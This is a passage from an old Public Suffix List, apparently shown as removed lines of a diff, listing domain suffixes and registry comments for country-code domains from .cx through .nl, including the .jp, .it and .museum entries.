-cx -gov.cx - -// cy : http://en.wikipedia.org/wiki/.cy -*.cy - -// cz : http://en.wikipedia.org/wiki/.cz -cz - -// de : http://en.wikipedia.org/wiki/.de -// Confirmed by registry (with technical -// reservations) 2008-07-01 -de - -// dj : http://en.wikipedia.org/wiki/.dj -dj - -// dk : http://en.wikipedia.org/wiki/.dk -// Confirmed by registry 2008-06-17 -dk - -// dm : http://en.wikipedia.org/wiki/.dm -dm -com.dm -net.dm -org.dm -edu.dm -gov.dm - -// do : http://en.wikipedia.org/wiki/.do -do -art.do -com.do -edu.do -gob.do -gov.do -mil.do -net.do -org.do -sld.do -web.do - -// dz : http://en.wikipedia.org/wiki/.dz -dz -com.dz -org.dz -net.dz -gov.dz -edu.dz -asso.dz -pol.dz -art.dz - -// ec : http://www.nic.ec/reg/paso1.asp -// Submitted by registry 2008-07-04 -ec -com.ec -info.ec -net.ec -fin.ec -k12.ec -med.ec -pro.ec -org.ec -edu.ec -gov.ec -gob.ec -mil.ec - -// edu : http://en.wikipedia.org/wiki/.edu -edu - -// ee : http://www.eenet.ee/EENet/dom_reeglid.html#lisa_B -ee -edu.ee -gov.ee -riik.ee -lib.ee -med.ee -com.ee -pri.ee -aip.ee -org.ee -fie.ee - -// eg : http://en.wikipedia.org/wiki/.eg -eg -com.eg -edu.eg -eun.eg -gov.eg -mil.eg -name.eg -net.eg -org.eg -sci.eg - -// er : http://en.wikipedia.org/wiki/.er -*.er - -// es : https://www.nic.es/site_ingles/ingles/dominios/index.html -es -com.es -nom.es -org.es -gob.es -edu.es - -// et : http://en.wikipedia.org/wiki/.et -*.et - -// eu : http://en.wikipedia.org/wiki/.eu -eu - -// fi : http://en.wikipedia.org/wiki/.fi -fi -// aland.fi : http://en.wikipedia.org/wiki/.ax -// This domain is being phased out in favor of .ax. As there are still many -// domains under aland.fi, we still keep it on the list until aland.fi is -// completely removed. -// TODO: Check for updates (expected to be phased out around Q1/2009) -aland.fi -// iki.fi : Submitted by Hannu Aronsson 2009-11-05 -iki.fi - -// fj : http://en.wikipedia.org/wiki/.fj -*.fj - -// fk : http://en.wikipedia.org/wiki/.fk -*.fk - -// fm : http://en.wikipedia.org/wiki/.fm -fm - -// fo : http://en.wikipedia.org/wiki/.fo -fo - -// fr : http://www.afnic.fr/ -// domaines descriptifs : http://www.afnic.fr/obtenir/chartes/nommage-fr/annexe-descriptifs -fr -com.fr -asso.fr -nom.fr -prd.fr -presse.fr -tm.fr -// domaines sectoriels : http://www.afnic.fr/obtenir/chartes/nommage-fr/annexe-sectoriels -aeroport.fr -assedic.fr -avocat.fr -avoues.fr -cci.fr -chambagri.fr -chirurgiens-dentistes.fr -experts-comptables.fr -geometre-expert.fr -gouv.fr -greta.fr -huissier-justice.fr -medecin.fr -notaires.fr -pharmacien.fr -port.fr -veterinaire.fr - -// ga : http://en.wikipedia.org/wiki/.ga -ga - -// gb : This registry is effectively dormant -// Submitted by registry 2008-06-12 - -// gd : http://en.wikipedia.org/wiki/.gd -gd - -// ge : http://www.nic.net.ge/policy_en.pdf -ge -com.ge -edu.ge -gov.ge -org.ge -mil.ge -net.ge -pvt.ge - -// gf : http://en.wikipedia.org/wiki/.gf -gf - -// gg : http://www.channelisles.net/applic/avextn.shtml -gg -co.gg -org.gg -net.gg -sch.gg -gov.gg - -// gh : http://en.wikipedia.org/wiki/.gh -// see also: http://www.nic.gh/reg_now.php -// Although domains directly at second level are not possible at the moment, -// they have been possible for some time and may come back. 
-gh -com.gh -edu.gh -gov.gh -org.gh -mil.gh - -// gi : http://www.nic.gi/rules.html -gi -com.gi -ltd.gi -gov.gi -mod.gi -edu.gi -org.gi - -// gl : http://en.wikipedia.org/wiki/.gl -// http://nic.gl -gl - -// gm : http://www.nic.gm/htmlpages%5Cgm-policy.htm -gm - -// gn : http://psg.com/dns/gn/gn.txt -// Submitted by registry 2008-06-17 -ac.gn -com.gn -edu.gn -gov.gn -org.gn -net.gn - -// gov : http://en.wikipedia.org/wiki/.gov -gov - -// gp : http://www.nic.gp/index.php?lang=en -gp -com.gp -net.gp -mobi.gp -edu.gp -org.gp -asso.gp - -// gq : http://en.wikipedia.org/wiki/.gq -gq - -// gr : https://grweb.ics.forth.gr/english/1617-B-2005.html -// Submitted by registry 2008-06-09 -gr -com.gr -edu.gr -net.gr -org.gr -gov.gr - -// gs : http://en.wikipedia.org/wiki/.gs -gs - -// gt : http://www.gt/politicas.html -*.gt - -// gu : http://gadao.gov.gu/registration.txt -*.gu - -// gw : http://en.wikipedia.org/wiki/.gw -gw - -// gy : http://en.wikipedia.org/wiki/.gy -// http://registry.gy/ -gy -co.gy -com.gy -net.gy - -// hk : https://www.hkdnr.hk -// Submitted by registry 2008-06-11 -hk -com.hk -edu.hk -gov.hk -idv.hk -net.hk -org.hk -公司.hk -教育.hk -敎育.hk -政府.hk -個人.hk -个人.hk -箇人.hk -網络.hk -网络.hk -组織.hk -網絡.hk -网絡.hk -组织.hk -組織.hk -組织.hk - -// hm : http://en.wikipedia.org/wiki/.hm -hm - -// hn : http://www.nic.hn/politicas/ps02,,05.html -hn -com.hn -edu.hn -org.hn -net.hn -mil.hn -gob.hn - -// hr : http://www.dns.hr/documents/pdf/HRTLD-regulations.pdf -hr -iz.hr -from.hr -name.hr -com.hr - -// ht : http://www.nic.ht/info/charte.cfm -ht -com.ht -shop.ht -firm.ht -info.ht -adult.ht -net.ht -pro.ht -org.ht -med.ht -art.ht -coop.ht -pol.ht -asso.ht -edu.ht -rel.ht -gouv.ht -perso.ht - -// hu : http://www.domain.hu/domain/English/sld.html -// Confirmed by registry 2008-06-12 -hu -co.hu -info.hu -org.hu -priv.hu -sport.hu -tm.hu -2000.hu -agrar.hu -bolt.hu -casino.hu -city.hu -erotica.hu -erotika.hu -film.hu -forum.hu -games.hu -hotel.hu -ingatlan.hu -jogasz.hu -konyvelo.hu -lakas.hu -media.hu -news.hu -reklam.hu -sex.hu -shop.hu -suli.hu -szex.hu -tozsde.hu -utazas.hu -video.hu - -// id : http://en.wikipedia.org/wiki/.id -// see also: https://register.pandi.or.id/ -id -ac.id -co.id -go.id -mil.id -net.id -or.id -sch.id -web.id - -// ie : http://en.wikipedia.org/wiki/.ie -ie -gov.ie - -// il : http://en.wikipedia.org/wiki/.il -*.il - -// im : https://www.nic.im/pdfs/imfaqs.pdf -im -co.im -ltd.co.im -plc.co.im -net.im -gov.im -org.im -nic.im -ac.im - -// in : http://en.wikipedia.org/wiki/.in -// see also: http://www.inregistry.in/policies/ -// Please note, that nic.in is not an offical eTLD, but used by most -// government institutions. -in -co.in -firm.in -net.in -org.in -gen.in -ind.in -nic.in -ac.in -edu.in -res.in -gov.in -mil.in - -// info : http://en.wikipedia.org/wiki/.info -info - -// int : http://en.wikipedia.org/wiki/.int -// Confirmed by registry 2008-06-18 -int -eu.int - -// io : http://www.nic.io/rules.html -// list of other 2nd level tlds ? 
-io -com.io - -// iq : http://www.cmc.iq/english/iq/iqregister1.htm -iq -gov.iq -edu.iq -mil.iq -com.iq -org.iq -net.iq - -// ir : http://www.nic.ir/Terms_and_Conditions_ir,_Appendix_1_Domain_Rules -// Also see http://www.nic.ir/Internationalized_Domain_Names -// Two .ir entries added at request of , 2010-04-16 -ir -ac.ir -co.ir -gov.ir -id.ir -net.ir -org.ir -sch.ir -// xn--mgba3a4f16a.ir (.ir, Persian YEH) -ایران.ir -// xn--mgba3a4fra.ir (.ir, Arabic YEH) -ايران.ir - -// is : http://www.isnic.is/domain/rules.php -// Confirmed by registry 2008-12-06 -is -net.is -com.is -edu.is -gov.is -org.is -int.is - -// it : http://en.wikipedia.org/wiki/.it -it -gov.it -edu.it -// list of reserved geo-names : -// http://www.nic.it/documenti/regolamenti-e-linee-guida/regolamento-assegnazione-versione-6.0.pdf -// (There is also a list of reserved geo-names corresponding to Italian -// municipalities : http://www.nic.it/documenti/appendice-c.pdf , but it is -// not included here.) -agrigento.it -ag.it -alessandria.it -al.it -ancona.it -an.it -aosta.it -aoste.it -ao.it -arezzo.it -ar.it -ascoli-piceno.it -ascolipiceno.it -ap.it -asti.it -at.it -avellino.it -av.it -bari.it -ba.it -andria-barletta-trani.it -andriabarlettatrani.it -trani-barletta-andria.it -tranibarlettaandria.it -barletta-trani-andria.it -barlettatraniandria.it -andria-trani-barletta.it -andriatranibarletta.it -trani-andria-barletta.it -traniandriabarletta.it -bt.it -belluno.it -bl.it -benevento.it -bn.it -bergamo.it -bg.it -biella.it -bi.it -bologna.it -bo.it -bolzano.it -bozen.it -balsan.it -alto-adige.it -altoadige.it -suedtirol.it -bz.it -brescia.it -bs.it -brindisi.it -br.it -cagliari.it -ca.it -caltanissetta.it -cl.it -campobasso.it -cb.it -carboniaiglesias.it -carbonia-iglesias.it -iglesias-carbonia.it -iglesiascarbonia.it -ci.it -caserta.it -ce.it -catania.it -ct.it -catanzaro.it -cz.it -chieti.it -ch.it -como.it -co.it -cosenza.it -cs.it -cremona.it -cr.it -crotone.it -kr.it -cuneo.it -cn.it -dell-ogliastra.it -dellogliastra.it -ogliastra.it -og.it -enna.it -en.it -ferrara.it -fe.it -fermo.it -fm.it -firenze.it -florence.it -fi.it -foggia.it -fg.it -forli-cesena.it -forlicesena.it -cesena-forli.it -cesenaforli.it -fc.it -frosinone.it -fr.it -genova.it -genoa.it -ge.it -gorizia.it -go.it -grosseto.it -gr.it -imperia.it -im.it -isernia.it -is.it -laquila.it -aquila.it -aq.it -la-spezia.it -laspezia.it -sp.it -latina.it -lt.it -lecce.it -le.it -lecco.it -lc.it -livorno.it -li.it -lodi.it -lo.it -lucca.it -lu.it -macerata.it -mc.it -mantova.it -mn.it -massa-carrara.it -massacarrara.it -carrara-massa.it -carraramassa.it -ms.it -matera.it -mt.it -medio-campidano.it -mediocampidano.it -campidano-medio.it -campidanomedio.it -vs.it -messina.it -me.it -milano.it -milan.it -mi.it -modena.it -mo.it -monza.it -monza-brianza.it -monzabrianza.it -monzaebrianza.it -monzaedellabrianza.it -monza-e-della-brianza.it -mb.it -napoli.it -naples.it -na.it -novara.it -no.it -nuoro.it -nu.it -oristano.it -or.it -padova.it -padua.it -pd.it -palermo.it -pa.it -parma.it -pr.it -pavia.it -pv.it -perugia.it -pg.it -pescara.it -pe.it -pesaro-urbino.it -pesarourbino.it -urbino-pesaro.it -urbinopesaro.it -pu.it -piacenza.it -pc.it -pisa.it -pi.it -pistoia.it -pt.it -pordenone.it -pn.it -potenza.it -pz.it -prato.it -po.it -ragusa.it -rg.it -ravenna.it -ra.it -reggio-calabria.it -reggiocalabria.it -rc.it -reggio-emilia.it -reggioemilia.it -re.it -rieti.it -ri.it -rimini.it -rn.it -roma.it -rome.it -rm.it -rovigo.it -ro.it -salerno.it -sa.it -sassari.it -ss.it 
-savona.it -sv.it -siena.it -si.it -siracusa.it -sr.it -sondrio.it -so.it -taranto.it -ta.it -tempio-olbia.it -tempioolbia.it -olbia-tempio.it -olbiatempio.it -ot.it -teramo.it -te.it -terni.it -tr.it -torino.it -turin.it -to.it -trapani.it -tp.it -trento.it -trentino.it -tn.it -treviso.it -tv.it -trieste.it -ts.it -udine.it -ud.it -varese.it -va.it -venezia.it -venice.it -ve.it -verbania.it -vb.it -vercelli.it -vc.it -verona.it -vr.it -vibo-valentia.it -vibovalentia.it -vv.it -vicenza.it -vi.it -viterbo.it -vt.it - -// je : http://www.channelisles.net/applic/avextn.shtml -je -co.je -org.je -net.je -sch.je -gov.je - -// jm : http://www.com.jm/register.html -*.jm - -// jo : http://www.dns.jo/Registration_policy.aspx -jo -com.jo -org.jo -net.jo -edu.jo -sch.jo -gov.jo -mil.jo -name.jo - -// jobs : http://en.wikipedia.org/wiki/.jobs -jobs - -// jp : http://en.wikipedia.org/wiki/.jp -// http://jprs.co.jp/en/jpdomain.html -// Submitted by registry 2008-06-11 -// Updated by registry 2008-12-04 -jp -// jp organizational type names -ac.jp -ad.jp -co.jp -ed.jp -go.jp -gr.jp -lg.jp -ne.jp -or.jp -// jp geographic type names -// http://jprs.jp/doc/rule/saisoku-1.html -*.aichi.jp -*.akita.jp -*.aomori.jp -*.chiba.jp -*.ehime.jp -*.fukui.jp -*.fukuoka.jp -*.fukushima.jp -*.gifu.jp -*.gunma.jp -*.hiroshima.jp -*.hokkaido.jp -*.hyogo.jp -*.ibaraki.jp -*.ishikawa.jp -*.iwate.jp -*.kagawa.jp -*.kagoshima.jp -*.kanagawa.jp -*.kawasaki.jp -*.kitakyushu.jp -*.kobe.jp -*.kochi.jp -*.kumamoto.jp -*.kyoto.jp -*.mie.jp -*.miyagi.jp -*.miyazaki.jp -*.nagano.jp -*.nagasaki.jp -*.nagoya.jp -*.nara.jp -*.niigata.jp -*.oita.jp -*.okayama.jp -*.okinawa.jp -*.osaka.jp -*.saga.jp -*.saitama.jp -*.sapporo.jp -*.sendai.jp -*.shiga.jp -*.shimane.jp -*.shizuoka.jp -*.tochigi.jp -*.tokushima.jp -*.tokyo.jp -*.tottori.jp -*.toyama.jp -*.wakayama.jp -*.yamagata.jp -*.yamaguchi.jp -*.yamanashi.jp -*.yokohama.jp -!metro.tokyo.jp -!pref.aichi.jp -!pref.akita.jp -!pref.aomori.jp -!pref.chiba.jp -!pref.ehime.jp -!pref.fukui.jp -!pref.fukuoka.jp -!pref.fukushima.jp -!pref.gifu.jp -!pref.gunma.jp -!pref.hiroshima.jp -!pref.hokkaido.jp -!pref.hyogo.jp -!pref.ibaraki.jp -!pref.ishikawa.jp -!pref.iwate.jp -!pref.kagawa.jp -!pref.kagoshima.jp -!pref.kanagawa.jp -!pref.kochi.jp -!pref.kumamoto.jp -!pref.kyoto.jp -!pref.mie.jp -!pref.miyagi.jp -!pref.miyazaki.jp -!pref.nagano.jp -!pref.nagasaki.jp -!pref.nara.jp -!pref.niigata.jp -!pref.oita.jp -!pref.okayama.jp -!pref.okinawa.jp -!pref.osaka.jp -!pref.saga.jp -!pref.saitama.jp -!pref.shiga.jp -!pref.shimane.jp -!pref.shizuoka.jp -!pref.tochigi.jp -!pref.tokushima.jp -!pref.tottori.jp -!pref.toyama.jp -!pref.wakayama.jp -!pref.yamagata.jp -!pref.yamaguchi.jp -!pref.yamanashi.jp -!city.chiba.jp -!city.fukuoka.jp -!city.hiroshima.jp -!city.kawasaki.jp -!city.kitakyushu.jp -!city.kobe.jp -!city.kyoto.jp -!city.nagoya.jp -!city.niigata.jp -!city.okayama.jp -!city.osaka.jp -!city.saitama.jp -!city.sapporo.jp -!city.sendai.jp -!city.shizuoka.jp -!city.yokohama.jp - -// ke : http://www.kenic.or.ke/index.php?option=com_content&task=view&id=117&Itemid=145 -*.ke - -// kg : http://www.domain.kg/dmn_n.html -kg -org.kg -net.kg -com.kg -edu.kg -gov.kg -mil.kg - -// kh : http://www.mptc.gov.kh/dns_registration.htm -*.kh - -// ki : http://www.ki/dns/index.html -ki -edu.ki -biz.ki -net.ki -org.ki -gov.ki -info.ki -com.ki - -// km : http://en.wikipedia.org/wiki/.km -// http://www.domaine.km/documents/charte.doc -km -org.km -nom.km -gov.km -prd.km -tm.km -edu.km -mil.km -ass.km -com.km -// These are only 
mentioned as proposed suggestions at domaine.km, but -// http://en.wikipedia.org/wiki/.km says they're available for registration: -coop.km -asso.km -presse.km -medecin.km -notaires.km -pharmaciens.km -veterinaire.km -gouv.km - -// kn : http://en.wikipedia.org/wiki/.kn -// http://www.dot.kn/domainRules.html -kn -net.kn -org.kn -edu.kn -gov.kn - -// kp : http://www.kcce.kp/en_index.php -com.kp -edu.kp -gov.kp -org.kp -rep.kp -tra.kp - -// kr : http://en.wikipedia.org/wiki/.kr -// see also: http://domain.nida.or.kr/eng/registration.jsp -kr -ac.kr -co.kr -es.kr -go.kr -hs.kr -kg.kr -mil.kr -ms.kr -ne.kr -or.kr -pe.kr -re.kr -sc.kr -// kr geographical names -busan.kr -chungbuk.kr -chungnam.kr -daegu.kr -daejeon.kr -gangwon.kr -gwangju.kr -gyeongbuk.kr -gyeonggi.kr -gyeongnam.kr -incheon.kr -jeju.kr -jeonbuk.kr -jeonnam.kr -seoul.kr -ulsan.kr - -// kw : http://en.wikipedia.org/wiki/.kw -*.kw - -// ky : http://www.icta.ky/da_ky_reg_dom.php -// Confirmed by registry 2008-06-17 -ky -edu.ky -gov.ky -com.ky -org.ky -net.ky - -// kz : http://en.wikipedia.org/wiki/.kz -// see also: http://www.nic.kz/rules/index.jsp -kz -org.kz -edu.kz -net.kz -gov.kz -mil.kz -com.kz - -// la : http://en.wikipedia.org/wiki/.la -// Submitted by registry 2008-06-10 -la -int.la -net.la -info.la -edu.la -gov.la -per.la -com.la -org.la -// see http://www.c.la/ -c.la - -// lb : http://en.wikipedia.org/wiki/.lb -// Submitted by registry 2008-06-17 -com.lb -edu.lb -gov.lb -net.lb -org.lb - -// lc : http://en.wikipedia.org/wiki/.lc -// see also: http://www.nic.lc/rules.htm -lc -com.lc -net.lc -co.lc -org.lc -edu.lc -gov.lc - -// li : http://en.wikipedia.org/wiki/.li -li - -// lk : http://www.nic.lk/seclevpr.html -lk -gov.lk -sch.lk -net.lk -int.lk -com.lk -org.lk -edu.lk -ngo.lk -soc.lk -web.lk -ltd.lk -assn.lk -grp.lk -hotel.lk - -// local : http://en.wikipedia.org/wiki/.local -local - -// lr : http://psg.com/dns/lr/lr.txt -// Submitted by registry 2008-06-17 -com.lr -edu.lr -gov.lr -org.lr -net.lr - -// ls : http://en.wikipedia.org/wiki/.ls -ls -co.ls -org.ls - -// lt : http://en.wikipedia.org/wiki/.lt -lt -// gov.lt : http://www.gov.lt/index_en.php -gov.lt - -// lu : http://www.dns.lu/en/ -lu - -// lv : http://www.nic.lv/DNS/En/generic.php -lv -com.lv -edu.lv -gov.lv -org.lv -mil.lv -id.lv -net.lv -asn.lv -conf.lv - -// ly : http://www.nic.ly/regulations.php -ly -com.ly -net.ly -gov.ly -plc.ly -edu.ly -sch.ly -med.ly -org.ly -id.ly - -// ma : http://en.wikipedia.org/wiki/.ma -// http://www.anrt.ma/fr/admin/download/upload/file_fr782.pdf -ma -co.ma -net.ma -gov.ma -org.ma -ac.ma -press.ma - -// mc : http://www.nic.mc/ -mc -tm.mc -asso.mc - -// md : http://en.wikipedia.org/wiki/.md -md - -// me : http://en.wikipedia.org/wiki/.me -me -co.me -net.me -org.me -edu.me -ac.me -gov.me -its.me -priv.me - -// mg : http://www.nic.mg/tarif.htm -mg -org.mg -nom.mg -gov.mg -prd.mg -tm.mg -edu.mg -mil.mg -com.mg - -// mh : http://en.wikipedia.org/wiki/.mh -mh - -// mil : http://en.wikipedia.org/wiki/.mil -mil - -// mk : http://en.wikipedia.org/wiki/.mk -// see also: http://dns.marnet.net.mk/postapka.php -mk -com.mk -org.mk -net.mk -edu.mk -gov.mk -inf.mk -name.mk - -// ml : http://www.gobin.info/domainname/ml-template.doc -// see also: http://en.wikipedia.org/wiki/.ml -ml -com.ml -edu.ml -gouv.ml -gov.ml -net.ml -org.ml -presse.ml - -// mm : http://en.wikipedia.org/wiki/.mm -*.mm - -// mn : http://en.wikipedia.org/wiki/.mn -mn -gov.mn -edu.mn -org.mn - -// mo : http://www.monic.net.mo/ -mo -com.mo -net.mo -org.mo -edu.mo -gov.mo - -// mobi 
: http://en.wikipedia.org/wiki/.mobi -mobi - -// mp : http://www.dot.mp/ -// Confirmed by registry 2008-06-17 -mp - -// mq : http://en.wikipedia.org/wiki/.mq -mq - -// mr : http://en.wikipedia.org/wiki/.mr -mr -gov.mr - -// ms : http://en.wikipedia.org/wiki/.ms -ms - -// mt : https://www.nic.org.mt/dotmt/ -*.mt - -// mu : http://en.wikipedia.org/wiki/.mu -mu -com.mu -net.mu -org.mu -gov.mu -ac.mu -co.mu -or.mu - -// museum : http://about.museum/naming/ -// http://index.museum/ -museum -academy.museum -agriculture.museum -air.museum -airguard.museum -alabama.museum -alaska.museum -amber.museum -ambulance.museum -american.museum -americana.museum -americanantiques.museum -americanart.museum -amsterdam.museum -and.museum -annefrank.museum -anthro.museum -anthropology.museum -antiques.museum -aquarium.museum -arboretum.museum -archaeological.museum -archaeology.museum -architecture.museum -art.museum -artanddesign.museum -artcenter.museum -artdeco.museum -arteducation.museum -artgallery.museum -arts.museum -artsandcrafts.museum -asmatart.museum -assassination.museum -assisi.museum -association.museum -astronomy.museum -atlanta.museum -austin.museum -australia.museum -automotive.museum -aviation.museum -axis.museum -badajoz.museum -baghdad.museum -bahn.museum -bale.museum -baltimore.museum -barcelona.museum -baseball.museum -basel.museum -baths.museum -bauern.museum -beauxarts.museum -beeldengeluid.museum -bellevue.museum -bergbau.museum -berkeley.museum -berlin.museum -bern.museum -bible.museum -bilbao.museum -bill.museum -birdart.museum -birthplace.museum -bonn.museum -boston.museum -botanical.museum -botanicalgarden.museum -botanicgarden.museum -botany.museum -brandywinevalley.museum -brasil.museum -bristol.museum -british.museum -britishcolumbia.museum -broadcast.museum -brunel.museum -brussel.museum -brussels.museum -bruxelles.museum -building.museum -burghof.museum -bus.museum -bushey.museum -cadaques.museum -california.museum -cambridge.museum -can.museum -canada.museum -capebreton.museum -carrier.museum -cartoonart.museum -casadelamoneda.museum -castle.museum -castres.museum -celtic.museum -center.museum -chattanooga.museum -cheltenham.museum -chesapeakebay.museum -chicago.museum -children.museum -childrens.museum -childrensgarden.museum -chiropractic.museum -chocolate.museum -christiansburg.museum -cincinnati.museum -cinema.museum -circus.museum -civilisation.museum -civilization.museum -civilwar.museum -clinton.museum -clock.museum -coal.museum -coastaldefence.museum -cody.museum -coldwar.museum -collection.museum -colonialwilliamsburg.museum -coloradoplateau.museum -columbia.museum -columbus.museum -communication.museum -communications.museum -community.museum -computer.museum -computerhistory.museum -comunicações.museum -contemporary.museum -contemporaryart.museum -convent.museum -copenhagen.museum -corporation.museum -correios-e-telecomunicações.museum -corvette.museum -costume.museum -countryestate.museum -county.museum -crafts.museum -cranbrook.museum -creation.museum -cultural.museum -culturalcenter.museum -culture.museum -cyber.museum -cymru.museum -dali.museum -dallas.museum -database.museum -ddr.museum -decorativearts.museum -delaware.museum -delmenhorst.museum -denmark.museum -depot.museum -design.museum -detroit.museum -dinosaur.museum -discovery.museum -dolls.museum -donostia.museum -durham.museum -eastafrica.museum -eastcoast.museum -education.museum -educational.museum -egyptian.museum -eisenbahn.museum -elburg.museum -elvendrell.museum -embroidery.museum 
-encyclopedic.museum -england.museum -entomology.museum -environment.museum -environmentalconservation.museum -epilepsy.museum -essex.museum -estate.museum -ethnology.museum -exeter.museum -exhibition.museum -family.museum -farm.museum -farmequipment.museum -farmers.museum -farmstead.museum -field.museum -figueres.museum -filatelia.museum -film.museum -fineart.museum -finearts.museum -finland.museum -flanders.museum -florida.museum -force.museum -fortmissoula.museum -fortworth.museum -foundation.museum -francaise.museum -frankfurt.museum -franziskaner.museum -freemasonry.museum -freiburg.museum -fribourg.museum -frog.museum -fundacio.museum -furniture.museum -gallery.museum -garden.museum -gateway.museum -geelvinck.museum -gemological.museum -geology.museum -georgia.museum -giessen.museum -glas.museum -glass.museum -gorge.museum -grandrapids.museum -graz.museum -guernsey.museum -halloffame.museum -hamburg.museum -handson.museum -harvestcelebration.museum -hawaii.museum -health.museum -heimatunduhren.museum -hellas.museum -helsinki.museum -hembygdsforbund.museum -heritage.museum -histoire.museum -historical.museum -historicalsociety.museum -historichouses.museum -historisch.museum -historisches.museum -history.museum -historyofscience.museum -horology.museum -house.museum -humanities.museum -illustration.museum -imageandsound.museum -indian.museum -indiana.museum -indianapolis.museum -indianmarket.museum -intelligence.museum -interactive.museum -iraq.museum -iron.museum -isleofman.museum -jamison.museum -jefferson.museum -jerusalem.museum -jewelry.museum -jewish.museum -jewishart.museum -jfk.museum -journalism.museum -judaica.museum -judygarland.museum -juedisches.museum -juif.museum -karate.museum -karikatur.museum -kids.museum -koebenhavn.museum -koeln.museum -kunst.museum -kunstsammlung.museum -kunstunddesign.museum -labor.museum -labour.museum -lajolla.museum -lancashire.museum -landes.museum -lans.museum -läns.museum -larsson.museum -lewismiller.museum -lincoln.museum -linz.museum -living.museum -livinghistory.museum -localhistory.museum -london.museum -losangeles.museum -louvre.museum -loyalist.museum -lucerne.museum -luxembourg.museum -luzern.museum -mad.museum -madrid.museum -mallorca.museum -manchester.museum -mansion.museum -mansions.museum -manx.museum -marburg.museum -maritime.museum -maritimo.museum -maryland.museum -marylhurst.museum -media.museum -medical.museum -medizinhistorisches.museum -meeres.museum -memorial.museum -mesaverde.museum -michigan.museum -midatlantic.museum -military.museum -mill.museum -miners.museum -mining.museum -minnesota.museum -missile.museum -missoula.museum -modern.museum -moma.museum -money.museum -monmouth.museum -monticello.museum -montreal.museum -moscow.museum -motorcycle.museum -muenchen.museum -muenster.museum -mulhouse.museum -muncie.museum -museet.museum -museumcenter.museum -museumvereniging.museum -music.museum -national.museum -nationalfirearms.museum -nationalheritage.museum -nativeamerican.museum -naturalhistory.museum -naturalhistorymuseum.museum -naturalsciences.museum -nature.museum -naturhistorisches.museum -natuurwetenschappen.museum -naumburg.museum -naval.museum -nebraska.museum -neues.museum -newhampshire.museum -newjersey.museum -newmexico.museum -newport.museum -newspaper.museum -newyork.museum -niepce.museum -norfolk.museum -north.museum -nrw.museum -nuernberg.museum -nuremberg.museum -nyc.museum -nyny.museum -oceanographic.museum -oceanographique.museum -omaha.museum -online.museum -ontario.museum -openair.museum 
-oregon.museum -oregontrail.museum -otago.museum -oxford.museum -pacific.museum -paderborn.museum -palace.museum -paleo.museum -palmsprings.museum -panama.museum -paris.museum -pasadena.museum -pharmacy.museum -philadelphia.museum -philadelphiaarea.museum -philately.museum -phoenix.museum -photography.museum -pilots.museum -pittsburgh.museum -planetarium.museum -plantation.museum -plants.museum -plaza.museum -portal.museum -portland.museum -portlligat.museum -posts-and-telecommunications.museum -preservation.museum -presidio.museum -press.museum -project.museum -public.museum -pubol.museum -quebec.museum -railroad.museum -railway.museum -research.museum -resistance.museum -riodejaneiro.museum -rochester.museum -rockart.museum -roma.museum -russia.museum -saintlouis.museum -salem.museum -salvadordali.museum -salzburg.museum -sandiego.museum -sanfrancisco.museum -santabarbara.museum -santacruz.museum -santafe.museum -saskatchewan.museum -satx.museum -savannahga.museum -schlesisches.museum -schoenbrunn.museum -schokoladen.museum -school.museum -schweiz.museum -science.museum -scienceandhistory.museum -scienceandindustry.museum -sciencecenter.museum -sciencecenters.museum -science-fiction.museum -sciencehistory.museum -sciences.museum -sciencesnaturelles.museum -scotland.museum -seaport.museum -settlement.museum -settlers.museum -shell.museum -sherbrooke.museum -sibenik.museum -silk.museum -ski.museum -skole.museum -society.museum -sologne.museum -soundandvision.museum -southcarolina.museum -southwest.museum -space.museum -spy.museum -square.museum -stadt.museum -stalbans.museum -starnberg.museum -state.museum -stateofdelaware.museum -station.museum -steam.museum -steiermark.museum -stjohn.museum -stockholm.museum -stpetersburg.museum -stuttgart.museum -suisse.museum -surgeonshall.museum -surrey.museum -svizzera.museum -sweden.museum -sydney.museum -tank.museum -tcm.museum -technology.museum -telekommunikation.museum -television.museum -texas.museum -textile.museum -theater.museum -time.museum -timekeeping.museum -topology.museum -torino.museum -touch.museum -town.museum -transport.museum -tree.museum -trolley.museum -trust.museum -trustee.museum -uhren.museum -ulm.museum -undersea.museum -university.museum -usa.museum -usantiques.museum -usarts.museum -uscountryestate.museum -usculture.museum -usdecorativearts.museum -usgarden.museum -ushistory.museum -ushuaia.museum -uslivinghistory.museum -utah.museum -uvic.museum -valley.museum -vantaa.museum -versailles.museum -viking.museum -village.museum -virginia.museum -virtual.museum -virtuel.museum -vlaanderen.museum -volkenkunde.museum -wales.museum -wallonie.museum -war.museum -washingtondc.museum -watchandclock.museum -watch-and-clock.museum -western.museum -westfalen.museum -whaling.museum -wildlife.museum -williamsburg.museum -windmill.museum -workshop.museum -york.museum -yorkshire.museum -yosemite.museum -youth.museum -zoological.museum -zoology.museum -ירושלים.museum -иком.museum - -// mv : http://en.wikipedia.org/wiki/.mv -// "mv" included because, contra Wikipedia, google.mv exists. 
-mv -aero.mv -biz.mv -com.mv -coop.mv -edu.mv -gov.mv -info.mv -int.mv -mil.mv -museum.mv -name.mv -net.mv -org.mv -pro.mv - -// mw : http://www.registrar.mw/ -mw -ac.mw -biz.mw -co.mw -com.mw -coop.mw -edu.mw -gov.mw -int.mw -museum.mw -net.mw -org.mw - -// mx : http://www.nic.mx/ -// Submitted by registry 2008-06-19 -mx -com.mx -org.mx -gob.mx -edu.mx -net.mx - -// my : http://www.mynic.net.my/ -my -com.my -net.my -org.my -gov.my -edu.my -mil.my -name.my - -// mz : http://www.gobin.info/domainname/mz-template.doc -*.mz - -// na : http://www.na-nic.com.na/ -// http://www.info.na/domain/ -na -info.na -pro.na -name.na -school.na -or.na -dr.na -us.na -mx.na -ca.na -in.na -cc.na -tv.na -ws.na -mobi.na -co.na -com.na -org.na - -// name : has 2nd-level tlds, but there's no list of them -name - -// nc : http://www.cctld.nc/ -nc -asso.nc - -// ne : http://en.wikipedia.org/wiki/.ne -ne - -// net : http://en.wikipedia.org/wiki/.net -net - -// CentralNic names : http://www.centralnic.com/names/domains -// Submitted by registry 2008-06-17 -gb.net -se.net -uk.net - -// ZaNiC names : http://www.za.net/ -// Confirmed by registry 2009-10-03 -za.net - -// nf : http://en.wikipedia.org/wiki/.nf -nf -com.nf -net.nf -per.nf -rec.nf -web.nf -arts.nf -firm.nf -info.nf -other.nf -store.nf - -// ng : http://psg.com/dns/ng/ -// Submitted by registry 2008-06-17 -ac.ng -com.ng -edu.ng -gov.ng -net.ng -org.ng - -// ni : http://www.nic.ni/dominios.htm -*.ni - -// nl : http://www.domain-registry.nl/ace.php/c,728,122,,,,Home.html -// Confirmed by registry (with technical -// reservations) 2008-06-08 -nl - -// BV.nl will be a registry for 